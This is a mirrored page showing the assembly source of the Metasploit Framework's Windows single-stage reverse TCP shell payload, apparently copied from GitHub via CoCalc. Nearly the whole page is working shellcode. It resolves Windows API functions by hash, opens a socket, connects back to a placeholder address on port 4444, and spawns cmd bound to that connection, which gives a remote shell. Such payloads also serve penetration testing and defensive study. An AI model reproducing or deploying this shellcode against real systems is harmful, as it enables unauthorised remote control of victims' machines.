CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/shellcode/windows/single_shell_reverse_tcp.asm
Views: 11780
1
;

2
; Metasploit Framework

3
; http://www.metasploit.com

4
;

5
; Source for shell_reverse_tcp (single)

6
;

7
; Authors: vlad902 <vlad902@gmail.com>

8
; Size   : 287

9
;

10


11
cld

12
push byte -0x15

13
dec ebp

14
call 0x2

15
pusha

16
mov ebp,[esp+0x24]

17
mov eax,[ebp+0x3c]

18
mov edi,[ebp+eax+0x78]

19
add edi,ebp

20
mov ecx,[edi+0x18]

21
mov ebx,[edi+0x20]

22
add ebx,ebp

23
dec ecx

24
mov esi,[ebx+ecx*4]

25
add esi,ebp

26
xor eax,eax

27
cdq

28
lodsb

29
test al,al

30
jz 0x34

31
ror edx,0xd

32
add edx,eax

33
jmp short 0x28

34
cmp edx,[esp+0x28]

35
jnz 0x1f

36
mov ebx,[edi+0x24]

37
add ebx,ebp

38
mov cx,[ebx+ecx*2]

39
mov ebx,[edi+0x1c]

40
add ebx,ebp

41
add ebp,[ebx+ecx*4]

42
mov [esp+0x1c],ebp

43
popa

44
ret

45
xor ebx,ebx

46
mov eax,[fs:ebx+0x30]

47
mov eax,[eax+0xc]

48
mov esi,[eax+0x1c]

49
lodsd

50
mov eax,[eax+0x8]

51
pop esi

52
push dword 0xec0e4e8e

53
push eax

54
call esi

55
push bx

56
push word 0x3233

57
push dword 0x5f327377

58
push esp

59
call eax

60
push dword 0x3bfcedcb

61
push eax

62
call esi

63
pop edi

64
mov ebp,esp

65
sub bp,0x208

66
push ebp

67
push byte +0x2

68
call eax

69
push dword 0xadf509d9

70
push edi

71
call esi

72
push ebx

73
push ebx

74
push ebx

75
push ebx

76
inc ebx

77
push ebx

78
inc ebx

79
push ebx

80
call eax

81
push dword 0xffffffff

82
push word 0x5c11

83
push bx

84
mov ecx,esp

85
xchg eax,ebp

86
push dword 0x60aaf9ec

87
push edi

88
call esi

89
push byte +0x10

90
push ecx

91
push ebp

92
call eax

93
o16 push byte +0x64

94
push word 0x6d63

95
push byte +0x50

96
pop ecx

97
sub esp,ecx

98
mov edi,esp

99
push byte +0x44

100
mov edx,esp

101
xor eax,eax

102
rep stosb

103
xchg eax,ebp

104
mov ebp,edi

105
inc byte [edx+0x2d]

106
inc byte [edx+0x2c]

107
lea edi,[edx+0x38]

108
stosd

109
stosd

110
stosd

111
push dword 0x16b3fe72

112
push dword [ebp+0x28]

113
call esi

114
pop ebx

115
push edi

116
push edx

117
push ecx

118
push ecx

119
push ecx

120
push byte +0x1

121
push ecx

122
push ecx

123
push ebp

124
push ecx

125
call eax

126
push dword 0xce05d9ad

127
push ebx

128
call esi

129
push byte -0x1

130
push dword [edi]

131
call eax

132
push dword 0x79c679e7

133
push dword [ebp+0x4]

134
call esi

135
push dword [edi-0x4]

136
call eax

137
push dword 0x5f048af0

138
push ebx

139
call esi

140
call eax

141


142